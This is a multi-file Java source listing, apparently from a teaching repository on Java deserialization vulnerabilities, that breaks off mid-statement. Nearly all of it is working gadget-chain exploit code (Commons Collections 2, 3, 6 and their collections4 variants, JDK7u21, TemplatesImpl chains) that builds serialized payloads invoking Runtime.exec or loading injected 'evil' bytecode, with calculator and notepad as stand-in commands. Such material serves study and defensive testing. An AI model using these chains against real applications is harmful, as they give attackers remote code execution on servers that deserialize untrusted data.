import java.io.ByteArrayOutputStream; 13 | import java.io.ObjectInputStream; 14 | import java.io.ObjectOutputStream; 15 | import java.lang.reflect.Field; 16 | import java.util.Comparator; 17 | import java.util.PriorityQueue; 18 | 19 | public class CommonsCollections2TemplatesImpl { 20 | public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception { 21 | Field field = obj.getClass().getDeclaredField(fieldName); 22 | field.setAccessible(true); 23 | field.set(obj, value); 24 | } 25 | 26 | protected static byte[] getBytescode() throws Exception { 27 | ClassPool pool = ClassPool.getDefault(); 28 | CtClass clazz = pool.get(evil.EvilTemplatesImpl.class.getName()); 29 | return clazz.toBytecode(); 30 | } 31 | 32 | public static void main(String[] args) throws Exception { 33 | TemplatesImpl obj = new TemplatesImpl(); 34 | setFieldValue(obj, "_bytecodes", new byte[][]{getBytescode()}); 35 | setFieldValue(obj, "_name", "HelloTemplatesImpl"); 36 | setFieldValue(obj, "_tfactory", new TransformerFactoryImpl()); 37 | 38 | Transformer transformer = new InvokerTransformer("toString", null, null); 39 | Comparator comparator = new TransformingComparator(transformer); 40 | PriorityQueue queue = new PriorityQueue(2, comparator); 41 | queue.add(obj); 42 | queue.add(obj); 43 | 44 | setFieldValue(transformer, "iMethodName", "newTransformer"); 45 | 46 | ByteArrayOutputStream barr = new ByteArrayOutputStream(); 47 | ObjectOutputStream oos = new ObjectOutputStream(barr); 48 | oos.writeObject(queue); 49 | oos.close(); 50 | 51 | System.out.println(barr); 52 | ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray())); 53 | Object o = (Object)ois.readObject(); 54 | } 55 | } 56 | -------------------------------------------------------------------------------- /jdk8/src/main/java/com/govuln/deserialization/CommonsCollections3.java: -------------------------------------------------------------------------------- 1 | package com.govuln.deserialization; 2 | 3 | import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; 4 | import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter; 5 | import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; 6 | import javassist.ClassPool; 7 | import javassist.CtClass; 8 | import org.apache.commons.collections.Transformer; 9 | import org.apache.commons.collections.functors.ChainedTransformer; 10 | import org.apache.commons.collections.functors.ConstantTransformer; 11 | import org.apache.commons.collections.functors.InstantiateTransformer; 12 | import org.apache.commons.collections.map.TransformedMap; 13 | 14 | import javax.xml.transform.Templates; 15 | import java.io.ByteArrayInputStream; 16 | import java.io.ByteArrayOutputStream; 17 | import java.io.ObjectInputStream; 18 | import java.io.ObjectOutputStream; 19 | import java.lang.annotation.Retention; 20 | import java.lang.reflect.Constructor; 21 | import java.lang.reflect.Field; 22 | import java.lang.reflect.InvocationHandler; 23 | import java.util.HashMap; 24 | import java.util.Map; 25 | 26 | public class CommonsCollections3 { 27 | public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception { 28 | Field field = obj.getClass().getDeclaredField(fieldName); 29 | field.setAccessible(true); 30 | field.set(obj, value); 31 | } 32 | 33 | public static void main(String[] args) throws Exception { 34 | TemplatesImpl obj = new TemplatesImpl(); 35 | setFieldValue(obj, "_bytecodes", new byte[][]{ 36 | ClassPool.getDefault().get(evil.EvilTemplatesImpl.class.getName()).toBytecode() 37 | }); 38 | setFieldValue(obj, "_name", "HelloTemplatesImpl"); 39 | setFieldValue(obj, "_tfactory", new TransformerFactoryImpl()); 40 | 41 | Transformer[] fakeTransformers = new Transformer[] {new ConstantTransformer(1)}; 42 | Transformer[] transformers = new Transformer[]{ 43 | new ConstantTransformer(TrAXFilter.class), 44 | new InstantiateTransformer( 45 | new Class[] { Templates.class }, 46 | new Object[] { obj }) 47 | }; 48 | 49 | Transformer transformerChain = new ChainedTransformer(fakeTransformers); 50 | 51 | Map innerMap = new HashMap(); 52 | innerMap.put("value", "xxxx"); 53 | Map outerMap = TransformedMap.decorate(innerMap, null, transformerChain); 54 | 55 | Class clazz = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler"); 56 | Constructor construct = clazz.getDeclaredConstructor(Class.class, Map.class); 57 | construct.setAccessible(true); 58 | InvocationHandler handler = (InvocationHandler) construct.newInstance(Retention.class, outerMap); 59 | 60 | setFieldValue(transformerChain, "iTransformers", transformers); 61 | // ================== 62 | // 生成序列化字符串 63 | ByteArrayOutputStream barr = new ByteArrayOutputStream(); 64 | ObjectOutputStream oos = new ObjectOutputStream(barr); 65 | oos.writeObject(handler); 66 | oos.close(); 67 | 68 | // 本地测试触发 69 | // System.out.println(barr); 70 | ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray())); 71 | Object o = (Object) ois.readObject(); 72 | } 73 | } 74 | -------------------------------------------------------------------------------- /jdk8/src/main/java/com/govuln/deserialization/CommonsCollections3For4.java: -------------------------------------------------------------------------------- 1 | package com.govuln.deserialization; 2 | 3 | import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; 4 | import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter; 5 | import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; 6 | import javassist.ClassPool; 7 | import javassist.CtClass; 8 | import org.apache.commons.collections4.Transformer; 9 | import org.apache.commons.collections4.functors.ChainedTransformer; 10 | import org.apache.commons.collections4.functors.ConstantTransformer; 11 | import org.apache.commons.collections4.functors.InstantiateTransformer; 12 | import org.apache.commons.collections4.map.TransformedMap; 13 | 14 | import javax.xml.transform.Templates; 15 | import java.io.ByteArrayInputStream; 16 | import java.io.ByteArrayOutputStream; 17 | import java.io.ObjectInputStream; 18 | import java.io.ObjectOutputStream; 19 | import java.lang.annotation.Retention; 20 | import java.lang.reflect.Constructor; 21 | import java.lang.reflect.Field; 22 | import java.lang.reflect.InvocationHandler; 23 | import java.util.HashMap; 24 | import java.util.Map; 25 | 26 | public class CommonsCollections3For4 { 27 | public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception { 28 | Field field = obj.getClass().getDeclaredField(fieldName); 29 | field.setAccessible(true); 30 | field.set(obj, value); 31 | } 32 | 33 | public static void main(String[] args) throws Exception { 34 | TemplatesImpl obj = new TemplatesImpl(); 35 | setFieldValue(obj, "_bytecodes", new byte[][]{ 36 | ClassPool.getDefault().get(evil.EvilTemplatesImpl.class.getName()).toBytecode() 37 | }); 38 | setFieldValue(obj, "_name", "HelloTemplatesImpl"); 39 | setFieldValue(obj, "_tfactory", new TransformerFactoryImpl()); 40 | 41 | Transformer[] fakeTransformers = new Transformer[] {new ConstantTransformer(1)}; 42 | Transformer[] transformers = new Transformer[]{ 43 | new ConstantTransformer(TrAXFilter.class), 44 | new InstantiateTransformer( 45 | new Class[] { Templates.class }, 46 | new Object[] { obj }) 47 | }; 48 | 49 | Transformer transformerChain = new ChainedTransformer(fakeTransformers); 50 | 51 | Map innerMap = new HashMap(); 52 | innerMap.put("value", "xxxx"); 53 | Map outerMap = TransformedMap.transformedMap(innerMap, null, transformerChain); 54 | 55 | Class clazz = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler"); 56 | Constructor construct = clazz.getDeclaredConstructor(Class.class, Map.class); 57 | construct.setAccessible(true); 58 | InvocationHandler handler = (InvocationHandler) construct.newInstance(Retention.class, outerMap); 59 | 60 | setFieldValue(transformerChain, "iTransformers", transformers); 61 | // ================== 62 | // 生成序列化字符串 63 | ByteArrayOutputStream barr = new ByteArrayOutputStream(); 64 | ObjectOutputStream oos = new ObjectOutputStream(barr); 65 | oos.writeObject(handler); 66 | oos.close(); 67 | 68 | // 本地测试触发 69 | // System.out.println(barr); 70 | ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray())); 71 | Object o = (Object) ois.readObject(); 72 | } 73 | } 74 | -------------------------------------------------------------------------------- /jdk8/src/main/java/com/govuln/deserialization/CommonsCollections6.java: -------------------------------------------------------------------------------- 1 | package com.govuln.deserialization; 2 | 3 | import org.apache.commons.collections.Transformer; 4 | import org.apache.commons.collections.functors.ChainedTransformer; 5 | import org.apache.commons.collections.functors.ConstantTransformer; 6 | import org.apache.commons.collections.functors.InvokerTransformer; 7 | import org.apache.commons.collections.keyvalue.TiedMapEntry; 8 | import org.apache.commons.collections.map.LazyMap; 9 | 10 | import java.io.*; 11 | import java.lang.reflect.Field; 12 | import java.util.HashMap; 13 | import java.util.Map; 14 | 15 | public class CommonsCollections6 { 16 | public static void main(String[] args) throws Exception { 17 | Transformer[] fakeTransformers = new Transformer[] {new ConstantTransformer(1)}; 18 | Transformer[] transformers = new Transformer[] { 19 | new ConstantTransformer(Runtime.class), 20 | new InvokerTransformer("getMethod", new Class[] { String.class, 21 | Class[].class }, new Object[] { "getRuntime", 22 | new Class[0] }), 23 | new InvokerTransformer("invoke", new Class[] { Object.class, 24 | Object[].class }, new Object[] { null, new Object[0] }), 25 | new InvokerTransformer("exec", new Class[] { String.class }, 26 | new String[] { "calc.exe" }), 27 | new ConstantTransformer(1), 28 | }; 29 | Transformer transformerChain = new ChainedTransformer(fakeTransformers); 30 | 31 | // 不再使用原CommonsCollections6中的HashSet,直接使用HashMap 32 | Map innerMap = new HashMap(); 33 | Map outerMap = LazyMap.decorate(innerMap, transformerChain); 34 | 35 | TiedMapEntry tme = new TiedMapEntry(outerMap, "keykey"); 36 | 37 | Map expMap = new HashMap(); 38 | expMap.put(tme, "valuevalue"); 39 | 40 | outerMap.remove("keykey"); 41 | 42 | Field f = ChainedTransformer.class.getDeclaredField("iTransformers"); 43 | f.setAccessible(true); 44 | f.set(transformerChain, transformers); 45 | 46 | // ================== 47 | // 生成序列化字符串 48 | ByteArrayOutputStream barr = new ByteArrayOutputStream(); 49 | ObjectOutputStream oos = new ObjectOutputStream(barr); 50 | oos.writeObject(expMap); 51 | oos.close(); 52 | 53 | // 本地测试触发 54 | System.out.println(barr); 55 | ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray())); 56 | Object o = (Object)ois.readObject(); 57 | } 58 | } 59 | -------------------------------------------------------------------------------- /jdk8/src/main/java/com/govuln/deserialization/CommonsCollections6For4.java: -------------------------------------------------------------------------------- 1 | package com.govuln.deserialization; 2 | 3 | import org.apache.commons.collections4.Transformer; 4 | import org.apache.commons.collections4.functors.ChainedTransformer; 5 | import org.apache.commons.collections4.functors.ConstantTransformer; 6 | import org.apache.commons.collections4.functors.InvokerTransformer; 7 | import org.apache.commons.collections4.keyvalue.TiedMapEntry; 8 | import org.apache.commons.collections4.map.LazyMap; 9 | 10 | import java.io.ByteArrayInputStream; 11 | import java.io.ByteArrayOutputStream; 12 | import java.io.ObjectInputStream; 13 | import java.io.ObjectOutputStream; 14 | import java.lang.reflect.Field; 15 | import java.util.HashMap; 16 | import java.util.Map; 17 | 18 | public class CommonsCollections6For4 { 19 | public static void main(String[] args) throws Exception { 20 | Transformer[] fakeTransformers = new Transformer[] {new ConstantTransformer(1)}; 21 | Transformer[] transformers = new Transformer[] { 22 | new ConstantTransformer(Runtime.class), 23 | new InvokerTransformer("getMethod", new Class[] { String.class, 24 | Class[].class }, new Object[] { "getRuntime", 25 | new Class[0] }), 26 | new InvokerTransformer("invoke", new Class[] { Object.class, 27 | Object[].class }, new Object[] { null, new Object[0] }), 28 | new InvokerTransformer("exec", new Class[] { String.class }, 29 | new String[] { "calc.exe" }), 30 | new ConstantTransformer(1), 31 | }; 32 | Transformer transformerChain = new ChainedTransformer(fakeTransformers); 33 | 34 | // 不再使用原CommonsCollections6中的HashSet,直接使用HashMap 35 | Map innerMap = new HashMap(); 36 | Map outerMap = LazyMap.lazyMap(innerMap, transformerChain); 37 | 38 | TiedMapEntry tme = new TiedMapEntry(outerMap, "keykey"); 39 | 40 | Map expMap = new HashMap(); 41 | expMap.put(tme, "valuevalue"); 42 | 43 | outerMap.remove("keykey"); 44 | 45 | Field f = ChainedTransformer.class.getDeclaredField("iTransformers"); 46 | f.setAccessible(true); 47 | f.set(transformerChain, transformers); 48 | 49 | // ================== 50 | // 生成序列化字符串 51 | ByteArrayOutputStream barr = new ByteArrayOutputStream(); 52 | ObjectOutputStream oos = new ObjectOutputStream(barr); 53 | oos.writeObject(expMap); 54 | oos.close(); 55 | 56 | // 本地测试触发 57 | System.out.println(barr); 58 | ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray())); 59 | Object o = (Object)ois.readObject(); 60 | } 61 | } 62 | -------------------------------------------------------------------------------- /jdk8/src/main/java/com/govuln/deserialization/CommonsCollections6Multiple.java: -------------------------------------------------------------------------------- 1 | package com.govuln.deserialization; 2 | 3 | import org.apache.commons.collections.Transformer; 4 | import org.apache.commons.collections.functors.ChainedTransformer; 5 | import org.apache.commons.collections.functors.ConstantTransformer; 6 | import org.apache.commons.collections.functors.InvokerTransformer; 7 | import org.apache.commons.collections.keyvalue.TiedMapEntry; 8 | import org.apache.commons.collections.map.LazyMap; 9 | 10 | import java.io.*; 11 | import java.lang.reflect.Field; 12 | import java.util.HashMap; 13 | import java.util.Map; 14 | 15 | public class CommonsCollections6Multiple { 16 | public static void main(String[] args) throws Exception { 17 | Transformer[] fakeTransformers = new Transformer[] {new ConstantTransformer(1)}; 18 | Transformer[] transformers = new Transformer[] { 19 | new ConstantTransformer(Runtime.class), 20 | new InvokerTransformer("getMethod", new Class[] { String.class, 21 | Class[].class }, new Object[] { "getRuntime", 22 | new Class[0] }), 23 | new InvokerTransformer("invoke", new Class[] { Object.class, 24 | Object[].class }, new Object[] { null, new Object[0] }), 25 | new InvokerTransformer("exec", new Class[] { String.class }, 26 | new String[] { "calc.exe" }), 27 | new ConstantTransformer(Runtime.class), 28 | new InvokerTransformer("getMethod", new Class[] { String.class, 29 | Class[].class }, new Object[] { "getRuntime", 30 | new Class[0] }), 31 | new InvokerTransformer("invoke", new Class[] { Object.class, 32 | Object[].class }, new Object[] { null, new Object[0] }), 33 | new InvokerTransformer("exec", new Class[] { String.class }, 34 | new String[] { "notepad.exe" }), 35 | new ConstantTransformer(1), 36 | }; 37 | Transformer transformerChain = new ChainedTransformer(fakeTransformers); 38 | 39 | // 不再使用原CommonsCollections6中的HashSet,直接使用HashMap 40 | Map innerMap = new HashMap(); 41 | Map outerMap = LazyMap.decorate(innerMap, transformerChain); 42 | 43 | TiedMapEntry tme = new TiedMapEntry(outerMap, "keykey"); 44 | 45 | Map expMap = new HashMap(); 46 | expMap.put(tme, "valuevalue"); 47 | 48 | outerMap.remove("keykey"); 49 | 50 | Field f = ChainedTransformer.class.getDeclaredField("iTransformers"); 51 | f.setAccessible(true); 52 | f.set(transformerChain, transformers); 53 | 54 | // ================== 55 | // 生成序列化字符串 56 | ByteArrayOutputStream barr = new ByteArrayOutputStream(); 57 | ObjectOutputStream oos = new ObjectOutputStream(barr); 58 | oos.writeObject(expMap); 59 | oos.close(); 60 | 61 | // 本地测试触发 62 | System.out.println(barr); 63 | ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray())); 64 | Object o = (Object)ois.readObject(); 65 | } 66 | } 67 | -------------------------------------------------------------------------------- /jdk8/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro.java: -------------------------------------------------------------------------------- 1 | package com.govuln.deserialization; 2 | 3 | import org.apache.commons.collections.Transformer; 4 | import org.apache.commons.collections.functors.ChainedTransformer; 5 | import org.apache.commons.collections.functors.ConstantTransformer; 6 | import org.apache.commons.collections.functors.InvokerTransformer; 7 | import org.apache.commons.collections.map.TransformedMap; 8 | 9 | import java.util.HashMap; 10 | import java.util.Map; 11 | 12 | public class CommonsCollectionsIntro { 13 | public static void main(String[] args) throws Exception { 14 | Transformer[] transformers = new Transformer[]{ 15 | new ConstantTransformer(Runtime.getRuntime()), 16 | new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"/System/Applications/Calculator.app/Contents/MacOS/Calculator"}), 17 | }; 18 | 19 | Transformer transformerChain = new ChainedTransformer(transformers); 20 | 21 | Map innerMap = new HashMap(); 22 | Map outerMap = TransformedMap.decorate(innerMap, null, transformerChain); 23 | outerMap.put("test", "xxxx"); 24 | } 25 | } -------------------------------------------------------------------------------- /jdk8/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro2.java: -------------------------------------------------------------------------------- 1 | package com.govuln.deserialization; 2 | 3 | import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; 4 | import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; 5 | import org.apache.commons.codec.binary.Base64; 6 | import org.apache.commons.collections.functors.ChainedTransformer; 7 | import org.apache.commons.collections.functors.ConstantTransformer; 8 | import org.apache.commons.collections.functors.InvokerTransformer; 9 | import org.apache.commons.collections.map.TransformedMap; 10 | import org.apache.commons.collections.Transformer; 11 | 12 | import java.lang.reflect.Field; 13 | import java.util.HashMap; 14 | import java.util.Map; 15 | 16 | public class CommonsCollectionsIntro2 { 17 | public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception { 18 | Field field = obj.getClass().getDeclaredField(fieldName); 19 | field.setAccessible(true); 20 | field.set(obj, value); 21 | } 22 | 23 | public static void main(String[] args) throws Exception { 24 | // source: bytecodes/HelloTemplateImpl.java 25 | byte[] code = Base64.decodeBase64("yv66vgAAADQAIQoABgASCQATABQIABUKABYAFwcAGAcAGQEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAaAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABjxpbml0PgEAAygpVgEAClNvdXJjZUZpbGUBABdIZWxsb1RlbXBsYXRlc0ltcGwuamF2YQwADgAPBwAbDAAcAB0BABNIZWxsbyBUZW1wbGF0ZXNJbXBsBwAeDAAfACABABJIZWxsb1RlbXBsYXRlc0ltcGwBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAQamF2YS9sYW5nL1N5c3RlbQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwEAE2phdmEvaW8vUHJpbnRTdHJlYW0BAAdwcmludGxuAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWACEABQAGAAAAAAADAAEABwAIAAIACQAAABkAAAADAAAAAbEAAAABAAoAAAAGAAEAAAAIAAsAAAAEAAEADAABAAcADQACAAkAAAAZAAAABAAAAAGxAAAAAQAKAAAABgABAAAACgALAAAABAABAAwAAQAOAA8AAQAJAAAALQACAAEAAAANKrcAAbIAAhIDtgAEsQAAAAEACgAAAA4AAwAAAA0ABAAOAAwADwABABAAAAACABE="); 26 | TemplatesImpl obj = new TemplatesImpl(); 27 | setFieldValue(obj, "_bytecodes", new byte[][] {code}); 28 | setFieldValue(obj, "_name", "HelloTemplatesImpl"); 29 | setFieldValue(obj, "_tfactory", new TransformerFactoryImpl()); 30 | 31 | Transformer[] transformers = new Transformer[]{ 32 | new ConstantTransformer(obj), 33 | new InvokerTransformer("newTransformer", null, null) 34 | }; 35 | 36 | Transformer transformerChain = new ChainedTransformer(transformers); 37 | 38 | Map innerMap = new HashMap(); 39 | Map outerMap = TransformedMap.decorate(innerMap, null, transformerChain); 40 | outerMap.put("test", "xxxx"); 41 | } 42 | } 43 | -------------------------------------------------------------------------------- /jdk8/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro3.java: -------------------------------------------------------------------------------- 1 | package com.govuln.deserialization; 2 | 3 | import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; 4 | import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter; 5 | import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; 6 | import org.apache.commons.codec.binary.Base64; 7 | import org.apache.commons.collections.functors.ChainedTransformer; 8 | import org.apache.commons.collections.functors.ConstantTransformer; 9 | import org.apache.commons.collections.functors.InstantiateTransformer; 10 | import org.apache.commons.collections.map.TransformedMap; 11 | import org.apache.commons.collections.Transformer; 12 | 13 | import javax.xml.transform.Templates; 14 | import java.lang.reflect.Field; 15 | import java.util.HashMap; 16 | import java.util.Map; 17 | 18 | public class CommonsCollectionsIntro3 { 19 | public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception { 20 | Field field = obj.getClass().getDeclaredField(fieldName); 21 | field.setAccessible(true); 22 | field.set(obj, value); 23 | } 24 | 25 | public static void main(String[] args) throws Exception { 26 | // source: bytecodes/HelloTemplateImpl.java 27 | byte[] code = Base64.decodeBase64("yv66vgAAADQAIQoABgASCQATABQIABUKABYAFwcAGAcAGQEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAaAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABjxpbml0PgEAAygpVgEAClNvdXJjZUZpbGUBABdIZWxsb1RlbXBsYXRlc0ltcGwuamF2YQwADgAPBwAbDAAcAB0BABNIZWxsbyBUZW1wbGF0ZXNJbXBsBwAeDAAfACABABJIZWxsb1RlbXBsYXRlc0ltcGwBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAQamF2YS9sYW5nL1N5c3RlbQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwEAE2phdmEvaW8vUHJpbnRTdHJlYW0BAAdwcmludGxuAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWACEABQAGAAAAAAADAAEABwAIAAIACQAAABkAAAADAAAAAbEAAAABAAoAAAAGAAEAAAAIAAsAAAAEAAEADAABAAcADQACAAkAAAAZAAAABAAAAAGxAAAAAQAKAAAABgABAAAACgALAAAABAABAAwAAQAOAA8AAQAJAAAALQACAAEAAAANKrcAAbIAAhIDtgAEsQAAAAEACgAAAA4AAwAAAA0ABAAOAAwADwABABAAAAACABE="); 28 | TemplatesImpl obj = new TemplatesImpl(); 29 | setFieldValue(obj, "_bytecodes", new byte[][] {code}); 30 | setFieldValue(obj, "_name", "HelloTemplatesImpl"); 31 | setFieldValue(obj, "_tfactory", new TransformerFactoryImpl()); 32 | 33 | Transformer[] transformers = new Transformer[]{ 34 | new ConstantTransformer(TrAXFilter.class), 35 | new InstantiateTransformer( 36 | new Class[] { Templates.class }, 37 | new Object[] { obj }) 38 | }; 39 | 40 | Transformer transformerChain = new ChainedTransformer(transformers); 41 | 42 | Map innerMap = new HashMap(); 43 | Map outerMap = TransformedMap.decorate(innerMap, null, transformerChain); 44 | outerMap.put("test", "xxxx"); 45 | } 46 | } 47 | -------------------------------------------------------------------------------- /jdk8/src/main/java/com/govuln/deserialization/JDK7u21.java: -------------------------------------------------------------------------------- 1 | package com.govuln.deserialization; 2 | 3 | import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; 4 | import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; 5 | import javassist.ClassPool; 6 | import org.apache.commons.codec.binary.Base64; 7 | 8 | import javax.xml.transform.Templates; 9 | import java.io.ByteArrayInputStream; 10 | import java.io.ByteArrayOutputStream; 11 | import java.io.ObjectInputStream; 12 | import java.io.ObjectOutputStream; 13 | import java.lang.reflect.Constructor; 14 | import java.lang.reflect.Field; 15 | import java.lang.reflect.InvocationHandler; 16 | import java.lang.reflect.Proxy; 17 | import java.util.HashMap; 18 | import java.util.HashSet; 19 | import java.util.LinkedHashSet; 20 | import java.util.Map; 21 | 22 | public class JDK7u21 { 23 | public static void main(String[] args) throws Exception { 24 | TemplatesImpl templates = new TemplatesImpl(); 25 | setFieldValue(templates, "_bytecodes", new byte[][]{ 26 | ClassPool.getDefault().get(evil.EvilTemplatesImpl.class.getName()).toBytecode() 27 | }); 28 | setFieldValue(templates, "_name", "HelloTemplatesImpl"); 29 | setFieldValue(templates, "_tfactory", new TransformerFactoryImpl()); 30 | 31 | String zeroHashCodeStr = "f5a5a608"; 32 | 33 | // 实例化一个map,并添加Magic Number为key,也就是f5a5a608,value先随便设置一个值 34 | HashMap map = new HashMap(); 35 | map.put(zeroHashCodeStr, "foo"); 36 | 37 | // 实例化AnnotationInvocationHandler类 38 | Constructor handlerConstructor = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler").getDeclaredConstructor(Class.class, Map.class); 39 | handlerConstructor.setAccessible(true); 40 | InvocationHandler tempHandler = (InvocationHandler) handlerConstructor.newInstance(Templates.class, map); 41 | 42 | // 为tempHandler创造一层代理 43 | Templates proxy = (Templates) Proxy.newProxyInstance(JDK7u21.class.getClassLoader(), new Class[]{Templates.class}, tempHandler); 44 | 45 | // 实例化HashSet,并将两个对象放进去 46 | HashSet set = new LinkedHashSet(); 47 | set.add(templates); 48 | set.add(proxy); 49 | 50 | // 将恶意templates设置到map中 51 | map.put(zeroHashCodeStr, templates); 52 | 53 | ByteArrayOutputStream barr = new ByteArrayOutputStream(); 54 | ObjectOutputStream oos = new ObjectOutputStream(barr); 55 | oos.writeObject(set); 56 | oos.close(); 57 | 58 | System.out.println(barr); 59 | ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray())); 60 | Object o = (Object)ois.readObject(); 61 | } 62 | 63 | public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception { 64 | Field field = obj.getClass().getDeclaredField(fieldName); 65 | field.setAccessible(true); 66 | field.set(obj, value); 67 | } 68 | } 69 | -------------------------------------------------------------------------------- /jdk8/src/main/java/com/govuln/deserialization/TemplatesImplDeserialization.java: -------------------------------------------------------------------------------- 1 | package com.govuln.deserialization; 2 | 3 | import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; 4 | import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; 5 | import org.apache.commons.codec.binary.Base64; 6 | import org.apache.commons.collections.Transformer; 7 | import org.apache.commons.collections.functors.ChainedTransformer; 8 | import org.apache.commons.collections.functors.ConstantTransformer; 9 | import org.apache.commons.collections.functors.InstantiateTransformer; 10 | import org.apache.commons.collections.functors.InvokerTransformer; 11 | import org.apache.commons.collections.map.LazyMap; 12 | import org.apache.commons.collections.map.TransformedMap; 13 | 14 | import javax.xml.transform.Templates; 15 | import java.io.ByteArrayInputStream; 16 | import java.io.ByteArrayOutputStream; 17 | import java.io.ObjectInputStream; 18 | import java.io.ObjectOutputStream; 19 | import java.lang.annotation.Retention; 20 | import java.lang.reflect.Constructor; 21 | import java.lang.reflect.Field; 22 | import java.lang.reflect.InvocationHandler; 23 | import java.lang.reflect.Proxy; 24 | import java.util.HashMap; 25 | import java.util.Map; 26 | 27 | public class TemplatesImplDeserialization { 28 | public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception { 29 | Field field = obj.getClass().getDeclaredField(fieldName); 30 | field.setAccessible(true); 31 | field.set(obj, value); 32 | } 33 | 34 | public static void main(String[] args) throws Exception { 35 | // source: bytecodes/HelloTemplateImpl.java 36 | byte[] code = 